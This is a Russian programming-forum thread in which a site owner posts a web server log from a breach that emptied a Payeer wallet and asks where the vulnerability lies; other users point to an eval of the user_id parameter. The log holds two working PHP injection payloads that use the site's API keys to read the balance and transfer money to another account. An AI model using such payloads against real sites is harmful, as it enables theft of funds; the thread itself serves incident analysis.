|
|
Регистрация Восстановить пароль |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
|
|
Опции темы | Поиск в этой теме |
26.02.2018, 20:16 | #1 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Взломали GET запросом и вывели деньги Payeer
Сразу прошу прощения если не там создал тему! Уважаемые господа дело в том,что у меня взломали сервер GET запросом. И вывели деньги из кошелька Payeer. Есть лог,прошу помочь Вас! Где дыра в скрипте и что делал хаккер,если смотреть по логу. Прошу дать ответ если не затруднит. И если можно скажите,как лучше закрыть эти дыры. Заранее благодарю! Лог прилагаю:
51.15.205.192 - - [25/Feb/2018:13:00:15 +0300] "GET / HTTP/1.1" 200 3152 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /style/style.css HTTP/1.1" 200 5044 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/jquery.bxSlider.js HTTP/1.1" 200 9037 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/functions.js HTTP/1.1" 200 0 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /js/easyTooltip.js HTTP/1.1" 200 1983 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:16 +0300] "GET /jquery.slimscroll.min.js HTTP/1.1" 200 2400 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:17 +0300] "GET /jquery.bxSlider.min.js HTTP/1.1" 200 4026 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:19 +0300] "GET /img/boy.png HTTP/1.1" 200 175883 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:19 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/top1.png HTTP/1.1" 200 2343 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/1.png HTTP/1.1" 200 20795 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/body_bg.png HTTP/1.1" 404 533 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:20 +0300] "GET /img/okno1.png HTTP/1.1" 200 255818 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:21 +0300] "GET /img/a1.png HTTP/1.1" 200 107085 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/in.png HTTP/1.1" 200 6156 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/kno1.png HTTP/1.1" 200 20887 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:22 +0300] "GET /img/a12.png HTTP/1.1" 200 105791 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:18 +0300] "GET /img/bg22.png HTTP/1.1" 200 2586750 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:29 +0300] "GET /img/top1.png HTTP/1.1" 200 0 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:29 +0300] "GET /img/a1.png HTTP/1.1" 200 109427 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/body_bg.png HTTP/1.1" 404 0 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/1.png HTTP/1.1" 200 21326 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:30 +0300] "GET /img/okno1.png HTTP/1.1" 200 255817 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/a12.png HTTP/1.1" 200 105791 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/kno1.png HTTP/1.1" 200 20887 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:31 +0300] "GET /img/in.png HTTP/1.1" 200 6156 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:00:34 +0300] "GET /favicon.ico HTTP/1.1" 200 1373 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:33 +0300] "GET /img/top2.png HTTP/1.1" 200 2311 "http://braveknights.ru/" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:44 +0300] "GET /?menu=users_list&user_id=$payeer%20 =%20new%20rfs_payeer%28$config-%3EAccountNumber,%20$config-%3EapiId,%20$config-%3EapiKey%29;var_dump%28$payeer-%3EgetBalance%28%29%29; HTTP/1.1" 200 2248 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/body_bg.png HTTP/1.1" 404 532 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:01:46 +0300] "GET /img/acc.png HTTP/1.1" 200 5301 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:21 +0300] "GET //?menu=users_list&user_id=$payeer=ne w%20rfs_payeer%28$config-%3EAccountNumber,$config-%3EapiId,$config-%3EapiKey%29;var_dump%28$payeer-%3Etransfer%28array%28curIn=%3ERUB, sum=%3E375,curOut=%3ERUB,to=%3EP898 20519,comment=%3ENoComment%29%29%29 ; HTTP/1.1" 200 2141 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:23 +0300] "GET /img/body_bg.png HTTP/1.1" 404 532 "http://braveknights.ru/style/style.css" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" 51.15.205.192 - - [25/Feb/2018:13:02:23 +0300] "GET /img/opacity-title.png HTTP/1.1" 404 538 |
26.02.2018, 21:45 | #2 | |
Старожил
Регистрация: 15.02.2010
Сообщений: 15,760
|
Цитата:
|
|
26.02.2018, 21:53 | #3 |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Чот я пока не понял, а как оно выполняется?
Вроде ж не похоже на классический SQL injection с Бобби. Неужели там внутри есть какой-то eval с участием значения из $_GET['user_id']?0_o
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. |
26.02.2018, 21:59 | #4 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Я так понял лазия по файлам он собрал пароли, а вывел он потому что api был подключен к магазину. Я не пойму зачем он лазил по картинкам в файлах скрипта?
|
26.02.2018, 22:06 | #5 |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Зачем пароли? Выше ж код перевода на его счет.
А картинки просто браузер грузил при переходах.
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. |
26.02.2018, 22:18 | #6 | |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Цитата:
Brave Knights - {!TITLE!} - Google Chrome 2018-02-26 21.17.25.jpg ЗЫ скрытые емаилов в списке тоже шедевральное.
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. Последний раз редактировалось Alex11223; 26.02.2018 в 22:25. |
|
26.02.2018, 23:13 | #7 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Taк,что искать eval в файлах?
|
26.02.2018, 23:17 | #8 |
Старожил
Регистрация: 12.01.2011
Сообщений: 19,500
|
Выше ж на скриншоте написано где.
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом. |
26.02.2018, 23:52 | #9 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Спасибо сейчас попробую разобраться
|
27.02.2018, 00:01 | #10 |
Пользователь
Регистрация: 26.02.2018
Сообщений: 13
|
Код:
Последний раз редактировалось Alex11223; 27.02.2018 в 00:12. |
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Взломали системный файл hosts | Restman | Общие вопросы C/C++ | 2 | 18.07.2015 05:35 |
Взломали сайт | ruslan0 | Безопасность, Шифрование | 6 | 01.10.2011 18:34 |
Взломали почту на яндексе, что делать? | Яр|/||< (^_^) | Безопасность, Шифрование | 4 | 17.07.2010 20:53 |
QIP взломали | OrdJONY | Свободное общение | 12 | 09.05.2009 12:12 |